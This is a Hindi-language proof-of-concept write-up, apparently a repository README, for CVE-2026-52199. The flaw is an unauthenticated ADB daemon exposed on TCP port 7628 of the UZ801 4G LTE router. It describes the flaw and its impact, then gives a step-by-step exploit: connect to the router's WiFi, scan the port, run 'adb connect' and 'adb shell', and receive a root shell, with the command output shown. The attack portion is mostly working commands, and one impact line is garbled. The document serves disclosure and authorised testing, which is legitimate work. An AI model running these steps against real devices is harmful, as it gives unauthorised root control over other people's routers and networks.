
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2026-52199 के लिए: UZ801 4G LTE राउटर पर उजागर ADB डेमॉन के माध्यम से अनधिकृत रिमोट कोड निष्पादन। इसमें भेद्यता विश्लेषण, प्रभाव मूल्यांकन, और अधिकृत सुरक्षा परीक्षण के लिए चरण-दर-चरण शोषण मार्गदर्शिका शामिल है।
एक गंभीर गलत पहुँच नियंत्रण भेद्यता Generic OEM UZ801_v2.1 4G LTE राउटर (फर्मवेयर V3.4.3) में मौजूद है। डिवाइस अनुचित रूप से एक अप्रमाणित एंड्रॉइड डिबग ब्रिज (ADB) डेमॉन (/sbin/adbd) को TCP पोर्ट 7628 पर आसन्न नेटवर्क (LAN/WiFi) के लिए उजागर करता है।
डिवाइस के स्थानीय नेटवर्क से जुड़ा एक हमलावर इस खामी का शोषण कर सभी प्रमाणीकरण तंत्रों को दरकिनार कर, एक ADB कनेक्शन स्थापित कर, और रूट विशेषाधिकारों के साथ मनमाना कोड निष्पादित कर सकता है।

/sbin/adbdइस भेद्यता के शोषण से पूर्ण सिस्टम समझौता होता है। प्रभाव में शामिल हैं:
root शेल में जाता है)शोषण प्रक्रिया में मानक adb क्लाइंट और आसन्न नेटवर्क पहुँच के अलावा किसी विशेष उपकरण की आवश्यकता नहीं है।
चरण 1: UZ801 राउटर के WiFi नेटवर्क से कनेक्ट करें (डिफ़ॉल्ट गेटवे आमतौर पर 192.168.100.1 होता है)।
चरण 2: खुले पोर्ट के लिए डिवाइस को स्कैन करें। पोर्ट 7628/TCP खुला दिखाई देगा।
चरण 3: हमलावर की मशीन से, अप्रलेखित पोर्ट पर ADB कनेक्शन शुरू करें:
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628
चरण 4: एक इंटरैक्टिव शेल का अनुरोध करें:
$ adb -s 192.168.100.1:7628 shell
चरण 5: हमलावर बिना किसी प्रमाणीकरण संकेत के तुरंत रूट शेल में प्रवेश कर जाता है:
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64
केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए।
इस रिपॉजिटरी में दी गई जानकारी और प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक उद्देश्यों और नेटवर्क को सुरक्षित करने में सहायता के लिए है। लेखक (lamaper) इस जानकारी के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। इस शोषण का उपयोग उन उपकरणों या नेटवर्कों के विरुद्ध न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।